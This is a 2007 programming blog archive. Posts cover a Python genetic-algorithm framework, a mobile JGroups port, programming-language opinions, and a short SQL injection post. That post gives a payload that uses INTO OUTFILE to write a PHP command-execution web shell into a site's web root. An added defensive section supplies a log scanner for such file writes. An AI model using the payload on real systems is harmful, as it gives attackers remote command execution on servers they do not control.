who needs social life when you have broadband?

Inventas vitam iuvat excoluisse per artes / Let us improve life through science and art.

Archive for October, 2007

Pyevolve - A Python Genetic Algorithms Framework

Hello, this is my redemption post after a long time without activity on the blog. I’m working on a complete Python genetic algorithms framework with many features; for now it is still under development, but there is an alpha version and some examples at the Google project hosting.

I’m doing my best to release new versions as soon as possible; I hope that this project will be used, since there are no good, easy-to-use GA frameworks in languages like Python.

http://code.google.com/p/pyevolve/

- Perone


JGroups-ME update

Today I’ve finished migrating JGroups-ME to version 2.4.1sp4 of JGroups. I’ve also finished porting the GossipRouter (created a MobileGossipRouter midlet that initializes it) and now we have a 100% mobile group communication toolkit which allows the creation of group communication systems for mobile computing!

Next step is to implement Bluetooth support (I’ll do this just after I finish writing my paper about JGroups-ME) and submit my version to the JGroups project so they can take a look and (maybe) commit to the official JGroups-ME version.

More on this subject soon. Please stay tuned ;P


back to basics

There is some tragic yet very interesting stuff happening to me.

As my undergrad project involves creating a group communication mechanism for mobile devices, I’m trying to become a Java programmer. I’ve never liked Java and you probably already know that. I don’t like it because it is slow and has too many fancy names for simple stuff (I guess this is just to increase the learning curve so Sun partners can sell more courses…). BUT, programming in JavaME is forcing me to practice/remember/learn a lot of techniques and algorithms I never thought I would need. So I’m almost saying that it is exciting to program in Java (for mobile devices!! the standard edition still sux a lot).

I’ve been a programmer since I was 15 (7yrs ago), I started with mIRC Scripting (good times..) then I’ve learned PHP, C (in college.. I’ve used it professionally only once, to develop a socket client-server application), Java and Python (which I use just for fun…) in that order. Although I don’t consider myself a good programmer, I can say I’m proficient in PHP (it’s been 5yrs now since I wrote my first mysql_fetch_array() snippet :P). The fact is that, except for C, all these languages give you so many built-in features and facilities that you forget some basic principles of programming.

I would dare to say that it is impossible to become a good programmer if you only know how to program in PHP, for example (and “writing applications that work” doesn’t make you a good programmer), because it makes programming too easy and too fast. Your boss will like it and if you need some simple applications this is good enough, but if you learn PHP as a 1st language you probably won’t know how to optimize your code or will go crazy when you face more complex situations.

Even these JavaEE devs who think they are better than the rest of humanity should try to learn some “low level” algorithms (such as binary trees, linked lists, sockets, threading internals, scheduling, etcetera) because learning how to use an API is pretty easy compared to how to implement these APIs :)

I’m not against PHP or Python and its classes/modules that make our life easier. I’m just concerned about learning how to use this stuff without knowing how they were made…

Here are my conclusions:
- There are languages that make you a faster programmer (or not)
- There are languages that make you a better programmer (or not)
- If I needed to choose between a JavaME and a JavaSE/JavaEE programmer I would definitely choose the JavaME programmer because he *should* write more efficient code. And it is easier to teach someone how to use an API than to teach someone how to implement a serialization mechanism and send objects through the network.
- I’m a terrible english wirter :) I’m considering start blogging in portuguese…


(real life) next steps in sql injection

We all know SQL Injection and a bunch of techniques to exploit this... I've decided to blog about a "new" one. Please don't consider this as "advanced sql injection" because it's not :D

MySQL is a great database management system and it allows you to do many things with the "select" statement, wouldn't it be TOO many things?

I guess everyone knows the basic "' or 1=1 /*" and its variants... but accessing restricted areas, changing user info and dropping tables aren't the only cool stuff you can do with sql injections.

There is a feature that allows you to save your select into a file. It's called SELECT INTO FILE (duh!) and things can get pretty dangerous if you use it with a sql injection.

Isn't it clear enough yet? Ok, let me try to help you get the big picture.

what if someone inserts this code:

SQL:
  ' union select ''<?php ini_set(\"max_execution_time\",0); system($_GET[cmd]); /*'',0,0,0,'*/ ?>' into outfile ' /home/mysite/lol.php' from users #

please notice that you'll need to know the documentroot path but this shouldn't be a problem with vulnerable php systems.

Well, I don't intend to give you a cookbook and promote n00bism. So, if you still haven't figured out how to take advantage of this, you probably shouldn't use it. Google might help you as well :)

happy hacking.

PS: syntax errors were generated on purpose.
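
Added example (not part of the original post): a defender-side check that flags queries in a MySQL general query log which write a file with INTO OUTFILE or INTO DUMPFILE, ranked by whether the target is a script inside a web root. The web-root list, the extension list, the log layout and the sample lines are assumptions constructed for illustration; only /home/mysite/lol.php comes from the post.

```python
import posixpath
import re

# Assumed values for illustration (only /home/mysite appears in the post).
WEB_ROOTS = ("/var/www", "/home/mysite")
SCRIPT_EXTS = {".php", ".phtml", ".cgi", ".jsp", ".asp", ".aspx"}

# INTO OUTFILE / INTO DUMPFILE followed by a quoted target path.
INTO_FILE = re.compile(
    r"\binto\s+(?:outfile|dumpfile)\s+(['\"])\s*(.+?)\s*\1", re.IGNORECASE)
# Drop comment delimiters so INTO/**/OUTFILE and /*!50000 ... */ still match.
COMMENT_MARKS = re.compile(r"/\*!?\d*|\*/")


def classify(query):
    """Return (severity, path) if the query writes a file, else None."""
    m = INTO_FILE.search(COMMENT_MARKS.sub(" ", query))
    if not m:
        return None
    path = posixpath.normpath(m.group(2))
    in_web_root = any(path.startswith(r.rstrip("/") + "/") for r in WEB_ROOTS)
    is_script = posixpath.splitext(path)[1].lower() in SCRIPT_EXTS
    if in_web_root and is_script:
        return "critical", path  # script written where the web server serves it
    if in_web_root or is_script:
        return "high", path
    return "review", path        # may be a legitimate export; confirm it


def scan(lines):
    """Return [(line_number, severity, path)] for log lines that write a file."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line.split("Query\t", 1)[-1])
        if verdict:
            hits.append((n, *verdict))
    return hits


# Constructed general-query-log lines; file contents are replaced by 'x'.
SAMPLE_LOG = [
    "2007-10-20T10:01:02Z 41 Query\tSELECT id FROM users WHERE login = 'alice'",
    "2007-10-20T10:01:09Z 41 Query\tSELECT id FROM users WHERE login = '' "
    "UNION SELECT 'x' INTO OUTFILE ' /home/mysite/lol.php' FROM users #'",
    "2007-10-20T10:02:30Z 42 Query\tSELECT * FROM orders "
    "INTO OUTFILE '/var/lib/mysql-files/orders.csv'",
    "2007-10-20T10:03:11Z 43 Query\tSELECT 1 INTO/**/DUMPFILE \"/tmp/a.php\"",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Detection is the fallback; the preventive controls are parameterized queries in the application, not granting the FILE privilege to the application's database account, and restricting export locations with MySQL's secure_file_priv setting.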


too soon…

Remember when I said I've found the best image generator class? It turned out that this class isn't everything I said previously. Actually it promises a lot of stuff, but still has too many bugs (for example, you cannot create a simple png with transparent background and I've also had trouble centralizing my text).

At least this class was well written and has been easy to customize.
